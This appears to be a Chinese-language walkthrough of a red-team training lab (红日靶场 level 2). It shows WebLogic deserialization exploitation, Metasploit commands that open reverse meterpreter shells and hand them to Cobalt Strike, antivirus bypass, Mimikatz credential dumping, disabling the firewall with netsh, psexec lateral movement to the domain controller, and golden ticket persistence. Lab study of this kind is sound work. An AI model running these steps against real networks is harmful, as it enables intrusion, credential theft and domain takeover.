红日靶场第二关
一、环境配置
环境说明
内网网段:10.10.10.1/24
DMZ网段:192.168.111.1/24
测试机地址:192.168.111.1(Windows),192.168.111.11(Linux)
防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息
DC
IP:10.10.10.10OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80IP2:192.168.111.80OS:Windows 2008(64)
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201IP2:192.168.111.201OS:Windows 7(32)
环境配置踩坑点:当登录WEB虚拟机时,需要先恢复快照3,登陆时切换用户为:WEB\de1ay 密码:1qaz@WSX才能进入,进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。
二、目标
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
Bypass UAC
Windows系统NTLM获取(理论知识:Windows认证)
Access Token利用(MSSQL利用)
WMI利用
网页代理,二层代理,特殊协议代理(DNS,ICMP)
域内信息收集
域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
域凭证收集
后门技术(黄金票据/白银票据/Sid History/MOF)
三、WEB外网打点
3.1信息收集(nmap):
访问7001端口,发现作妖处:
3.2信息收集(dirsearch):
3.3漏洞检测
网上公开有漏洞,印象深刻的是未授权的漏洞,但是进去之后很难找到用户名和密码,直接用weblogic漏洞工具检测。
存在CVE_2020_2551漏洞
存在CVE_2019_2725漏洞
CVE_2019_2725漏洞对应JAVA反序列化漏洞,可以直接工具。
拿下服务器:
### 3.4更新(无关闭防火墙上线)
通过上面的weblogic扫描发现,SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp
MSF:
> use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
> set rhosts 192.168.235.80
> set lhost 192.168.235.129
> set target 1
> set payload windows/meterpreter/reverse_http
> background 拿到session 1
弹给CS:
> use exploit/windows/local/payload_inject
> set payload windows/meterpreter/reverse_http
> set DisablePayloadHandler true
> set lhost 192.168.111.129
> set lport 3333
> set session 1
上线后提权,后续步骤一样:
四、内网渗透
4.1 上线CS
4.1.1 发现360杀软
4.1.2 powershell绕过360杀软
反弹CS成功:
4.2 信息收集
4.2.1 判断是否存在域
ipconfig /all ,DNS后缀de1ay.com,存在域
net config workstation
4.2.2 提权(MS14-58)
测试权限shell net view /domain
提权成功
4.2.3 获取凭证
access—>hash dump
Mimikatz抓取
4.2.4 继续信息收集
ipconfig /all
net config workstation # 当前登录域
netsh advfirewall set allprofiles state off # 关闭防火墙
net time /domain # Ping获取域控IP
nltest /dsgetdc:<domain_name> # 也可以获取域控IP
net view /domain
net view # 域内主机
net user /domain # 域内用户
net group "domain admins" /domain # 域管理员
net group "domain controllers" /domain # 域控
域内主机:
资产收集:(ICMP)协议
4.2.5 开启3389
4.3 内网横向
4.3.1 MSF联动CS
- 通过
payload_inject
将Shell发给CS
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set LHOST 192.168.111.2
msf6 exploit(windows/local/payload_inject) > set LPORT 10080
msf6 exploit(windows/local/payload_inject) > set session 1
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
msf6 exploit(windows/local/payload_inject) > run
4.3.2 CS联动MSF
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用x64
msf> set LHOST <MSF_IP>
msf> set LPORT <MSF_Port> # 设置任意端口进行监听
# 启动监听器
msf> run
4.3.3 上线CS目标
portscan 10.10.10.1/24 445 arp 200
)]
4.4 psexec传递
4.4.1 拿下PC
获取凭据后,需要对目标网段进行端口存活探测,缩小范围。探测方式比较多,本文仅依托CobalStrike本身完成,不借助其他工具。因为是psexec传递登录,这里仅需探测445端口。( psexec:在主机上使用服务派生会话 )
)]
4.4.2 拿下DC
4.4.1 配置监听
4.4.2 psexec传递给DC
拿下域控!!!
五、权限维持(黄金票据)
5.1 查看账户NTLM HASH和SID值
5.2 黄金票据利用
黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。
黄金票据的条件要求:
1.域名称
2.域的SID值
3.域的KRBTGT账户NTLM密码哈希
4.伪造用户名
黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
- WEB机 Administrator 权限机器->右键->Access->Golden Ticket
运行中
5.2.1伪造用户名成功
shell dir \DC\C$